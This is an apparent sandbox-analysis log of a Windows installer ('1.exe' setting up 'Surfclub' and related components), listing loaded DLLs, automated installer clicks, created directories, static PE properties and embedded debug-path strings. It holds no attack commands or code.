    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: schannel.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: mskeyprotect.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: ntasn1.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: ncrypt.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: ncryptsslp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: msasn1.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: cryptsp.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: rsaenh.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: cryptbase.dll
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Section loaded: gpapi.dll
    Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: apphelp.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: aclayers.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc_os.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: secur32.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: mswsock.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: rasadhlp.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: schannel.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: dpapi.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: mskeyprotect.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: ncryptsslp.dll
    Source: C:\Users\user\Desktop\1.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
    Source: C:\Users\user\Desktop\1.exe | Automated click: I accept the terms in the License Agreement
    Source: C:\Users\user\Desktop\1.exe | Automated click: Next >
    Source: C:\Users\user\Desktop\1.exe | Automated click: Next >
    Source: C:\Users\user\Desktop\1.exe | Automated click: Install
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Program Files\Surfclub\Install.exe | Directory created: C:\Program Files\Surfclub\Surfclub.exe
    Source: C:\Program Files\Surfclub\Surfclub.exe | Directory created: C:\Program Files\Surfclub\uuid
    Source: C:\Program Files\Surfclub\Surfclub.exe | Directory created: C:\Program Files\Surfclub\domains
    Source: C:\Program Files\Surfclub\Surfclub.exe | Directory created: C:\Program Files\Surfclub\installation_config.json
    Source: 1.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
    Source: 1.exe | Static file information: File size 34350912 > 1048576
    Source: 1.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c7e00
    Source: 1.exe | Static PE information: More than 200 imports for KERNEL32.dll
    Source: 1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: 1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: 1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: 1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: 1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: 1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: 1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: 1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: MainSoftware.exe, 00000009.00000002.2459866027.0000024A2D710000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Sockets.ni.pdb source: MainSoftware.exe, 00000009.00000002.2459347730.0000024A2D621000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459431055.0000024A2D661000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Json\Release\net8.0\System.Text.Json.pdb source: MainSoftware.exe, 00000009.00000002.2458563735.0000024A2D4C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458435026.0000024A2D42C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2499249216.0000021DED311000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdb source: MainSoftware.exe, 00000009.00000002.2458048833.0000024A2D391000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487209932.0000021DEA141000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458406613.0000024A2D411000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458284663.0000024A2D3F7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: MainSoftware.exe, 00000009.00000002.2456750245.0000024A2CF93000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456841490.0000024A2CFC1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: MainSoftware.exe, 00000009.00000002.2457056110.0000024A2D096000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457231097.0000024A2D161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486216479.0000021DE9F91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdb source: MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2F0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdb source: MainSoftware.exe, 00000009.00000002.2457056110.0000024A2D091000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486011190.0000021DE9EC1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Security.ni.pdb source: MainSoftware.exe, 00000009.00000002.2456889306.0000024A2CFF9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456992556.0000024A2D041000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2485790532.0000021DE9E29000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Principal.Windows.ni.pdb source: MainSoftware.exe, 00000009.00000002.2471636608.0000024A30491000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471927266.0000024A304B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488653015.0000021DEA2F1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: MainSoftware.exe, 00000009.00000002.2457944763.0000024A2D371000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458017065.0000024A2D381000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ObjectModel.ni.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3D4000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: MainSoftware.exe, 00000009.00000002.2459714008.0000024A2D6D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459648718.0000024A2D6C2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487984945.0000021DEA262000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.Json.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458168635.0000024A2D3CA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458251640.0000024A2D3E1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: MainSoftware.exe, 00000009.00000002.2459307961.0000024A2D601000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5DD000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Installers Project\Generic\ConsoleApp1\obj\Release\net8.0\win-x64\ConsoleApp1.pdb source: MainSoftware.exe, 00000009.00000002.2453377610.0000020993E41000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453268537.0000020993E37000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: MainSoftware.exe, 00000009.00000002.2459749816.0000024A2D6ED000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459831114.0000024A2D701000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: MainSoftware.exe, 00000009.00000002.2453611805.0000020993ED3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453831581.00000209957C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482080339.0000021DE7E51000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Text.Json.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458563735.0000024A2D4C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458435026.0000024A2D42C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2499249216.0000021DED311000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Linq.ni.pdb source: MainSoftware.exe, 00000009.00000002.2453611805.0000020993ED3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453831581.00000209957C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482080339.0000021DE7E51000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457807688.0000024A2D342000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: MainSoftware.exe, 00000009.00000002.2456286438.0000024A2B351000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456196090.0000024A2B349000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2459117236.0000024A2D5C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459006147.0000024A2D5BC000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog/obj/Release/net8.0/Serilog.pdb source: MainSoftware.exe, 00000009.00000002.2453861770.00000209957FD000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453952929.0000020995831000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482321883.0000021DE7EC1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdbUGP source: 1.exe, 00000000.00000003.1702765989.0000000009BF5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886484951.00000000075B7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Collections.ni.pdb source: MainSoftware.exe, 00000009.00000002.2453520509.0000020993E71000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453570792.0000020993EA9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2455864746.0000024A2B198000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455976436.0000024A2B241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483529829.0000021DE8071000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.CoreLib.ni.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: MainSoftware.exe, 00000009.00000002.2457601992.0000024A2D271000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457473544.0000024A2D247000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: MainSoftware.exe, 00000009.00000002.2456147251.0000024A2B321000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2FB000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483635124.0000021DE812B000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483816012.0000021DE8151000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: MainSoftware.exe, 00000009.00000002.2452853423.0000020993BF1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457323456.0000024A2D22B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2459866027.0000024A2D710000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Claims.ni.pdb source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2457056110.0000024A2D091000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486011190.0000021DE9EC1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2458048833.0000024A2D391000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487209932.0000021DEA141000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ObjectModel\Release\net8.0\System.ObjectModel.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3D4000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Ping.ni.pdb source: MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2F0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbn source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdbSHA256S source: MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2F0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: MainSoftware.exe, 00000009.00000002.2472309573.0000024A3051C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472443393.0000024A30531000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdb source: MainSoftware.exe, 00000009.00000002.2455757141.0000024A2B141000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455687451.0000024A2B118000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: 1.exe, 1.exe, 00000000.00000000.1671191024.0000000000A19000.00000002.00000001.01000000.00000003.sdmp, 1.exe, 00000000.00000002.2583513984.0000000000A19000.00000002.00000001.01000000.00000003.sdmp, 1.exe, 00000004.00000002.2546889945.0000000000A19000.00000002.00000001.01000000.00000003.sdmp, 1.exe, 00000004.00000000.1876100284.0000000000A19000.00000002.00000001.01000000.00000003.sdmp
    Source: Binary string: System.Net.NameResolution.ni.pdb source: MainSoftware.exe, 00000009.00000002.2459749816.0000024A2D6ED000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459831114.0000024A2D701000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: MainSoftware.exe, 00000009.00000002.2456750245.0000024A2CF93000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456841490.0000024A2CFC1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdb source: MainSoftware.exe, 00000009.00000002.2459117236.0000024A2D5C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459006147.0000024A2D5BC000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Threading.ni.pdb source: MainSoftware.exe, 00000009.00000002.2452853423.0000020993BF1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457323456.0000024A2D22B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Net/Release/net8.0-windows/System.Net.pdb source: MainSoftware.exe, 00000009.00000002.2459006147.0000024A2D5B7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Sinks.Http/obj/Release/netstandard2.1/Serilog.Sinks.Http.pdb source: MainSoftware.exe, 00000009.00000002.2454027142.0000020995879000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455666591.0000024A2B101000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Bundle Project\MSIInstaller\obj\Release\net8.0\win-x64\linked\MSIInstaller.pdb source: 1.exe, 00000000.00000003.1953629935.000000000C7C0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Numerics/Release/net8.0-windows/System.Numerics.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3D0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: MainSoftware.exe, 00000009.00000002.2458132025.0000024A2D3B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458048833.0000024A2D395000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5D5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: MainSoftware.exe, 00000009.00000002.2457807688.0000024A2D342000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.NetworkInformation.ni.pdb source: MainSoftware.exe, 00000009.00000002.2473142423.0000024A30971000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472689319.0000024A3095A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: #.Pdb source: 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2460054054.0000024A2D721000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdb source: 1.exe, 00000000.00000003.1702765989.0000000009BF5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886484951.00000000075B7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Text.Encodings.Web.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D55A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458853975.0000024A2D571000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Collections.Concurrent.ni.pdb source: MainSoftware.exe, 00000009.00000002.2459307961.0000024A2D601000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5DD000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.Process.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457655754.0000024A2D2E3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457768047.0000024A2D311000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2507733360.0000021DED853000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457909781.0000024A2D361000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457807688.0000024A2D349000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2473396348.000001DD50A71000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NetworkInformation\Release\net8.0-windows\System.Net.NetworkInformation.pdb source: MainSoftware.exe, 00000009.00000002.2473142423.0000024A30971000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472689319.0000024A3095A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.Uri.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457601992.0000024A2D271000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457473544.0000024A2D247000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: MainSoftware.exe, 00000009.00000002.2453520509.0000020993E71000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453570792.0000020993EA9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Text.Encoding/Release/net8.0-windows/System.Text.Encoding.pdb source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D556000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\FileOperations.pdb source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: 1.exe, 00000000.00000003.1953629935.000000000C63F000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, MainSoftware.exe, 00000009.00000000.2403069778.00007FF7A2BF8000.00000002.00000001.01000000.0000000A.sdmp, SoftwareDistributor.exe
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2456889306.0000024A2CFF9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456992556.0000024A2D041000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2485790532.0000021DE9E29000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: MainSoftware.exe, 00000009.00000002.2458406613.0000024A2D411000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458284663.0000024A2D3F7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: MainSoftware.exe, 00000009.00000002.2456750245.0000024A2CF93000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456841490.0000024A2CFC1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Collections.NonGeneric.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457944763.0000024A2D371000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458017065.0000024A2D381000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Threading.Timer/Release/net8.0-windows/System.Threading.Timer.pdb source: MainSoftware.exe, 00000009.00000002.2457323456.0000024A2D227000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: MainSoftware.exe, 00000009.00000002.2457655754.0000024A2D2E3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457768047.0000024A2D311000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2507733360.0000021DED853000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdbE source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
